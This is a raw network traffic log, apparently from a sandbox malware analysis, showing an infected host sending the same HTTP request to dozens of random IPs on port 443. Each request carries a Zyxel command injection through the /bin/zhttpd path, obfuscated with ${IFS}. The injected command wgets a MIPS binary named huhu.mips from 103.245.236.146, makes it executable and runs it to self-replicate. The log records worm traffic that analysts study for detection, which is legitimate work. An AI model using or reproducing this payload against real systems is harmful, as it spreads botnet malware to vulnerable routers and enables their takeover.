                                                Jan 29, 2024 07:07:51.412925005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5254192.168.2.2337746223.243.230.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.412938118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5255192.168.2.2359358134.192.84.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.415616989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5256192.168.2.234091257.182.128.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.415652037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5257192.168.2.236076227.109.206.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.415693998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5258192.168.2.234428457.68.39.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416137934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5259192.168.2.2341508186.202.100.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416194916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5260192.168.2.235276094.108.228.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416244030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5261192.168.2.2334508182.114.157.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416285038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5262192.168.2.234412238.138.80.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416291952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5263192.168.2.236007427.71.123.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416342020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5264192.168.2.2340000201.254.158.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416393042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5265192.168.2.2353774152.237.200.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416410923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5266192.168.2.2359172129.42.193.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:51.416420937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5267192.168.2.2359858144.189.146.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424237013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5268192.168.2.234180438.58.112.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424277067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5269192.168.2.2357670178.170.24.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424319983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5270192.168.2.233383697.225.80.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424366951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5271192.168.2.234359458.220.211.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424391985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5272192.168.2.2349084180.18.113.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424448967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5273192.168.2.233422461.80.173.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424477100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5274192.168.2.2334788183.131.54.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424510956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5275192.168.2.2354952200.209.44.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424545050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5276192.168.2.2356846191.247.119.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424559116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5277192.168.2.2340572128.12.103.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424603939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5278192.168.2.2337436199.171.106.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424643040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5279192.168.2.234878681.216.166.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424657106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5280192.168.2.233787668.8.35.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424725056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5281192.168.2.234800659.3.242.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424743891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5282192.168.2.2352946173.134.214.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424784899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5283192.168.2.2352398105.134.55.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424835920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5284192.168.2.2358814169.10.39.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424876928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5285192.168.2.2359254113.200.176.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424901962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5286192.168.2.2358238132.213.55.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.424938917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5287192.168.2.233883432.208.78.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425003052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5288192.168.2.234995453.179.224.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425040960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5289192.168.2.2346332172.186.175.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425091028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5290192.168.2.2336772199.21.104.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425127029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5291192.168.2.2338432192.228.147.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425143957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5292192.168.2.233777473.118.32.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425213099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5293192.168.2.2359960174.18.99.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425265074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5294192.168.2.234844660.142.27.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425329924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5295192.168.2.234473468.166.215.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425343990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5296192.168.2.2355190110.187.251.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425374031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5297192.168.2.233686667.56.100.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425434113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5298192.168.2.2350184162.22.211.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425471067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5299192.168.2.2334242184.156.122.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425510883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5300192.168.2.233516043.164.111.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425532103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5301192.168.2.2354570162.217.245.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425569057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5302192.168.2.23577442.163.108.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425584078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5303192.168.2.2360622161.229.216.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425621033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5304192.168.2.2357122179.212.251.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425684929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5305192.168.2.2336856200.215.9.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425718069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5306192.168.2.236043286.254.188.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425761938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5307192.168.2.2343646115.124.77.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425811052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5308192.168.2.2345950221.168.209.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425860882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5309192.168.2.2360052153.204.74.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425911903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5310192.168.2.2346626181.141.209.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425941944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5311192.168.2.2333464183.109.1.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.425977945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5312192.168.2.234000684.114.16.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426033020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5313192.168.2.235729049.175.250.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426062107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5314192.168.2.235075236.126.65.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426095009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5315192.168.2.234343443.148.8.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426131010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5316192.168.2.235107478.132.5.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:52.426151991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5317192.168.2.2341886123.217.210.175443
                                                TimestampBytes transferredDirectionData
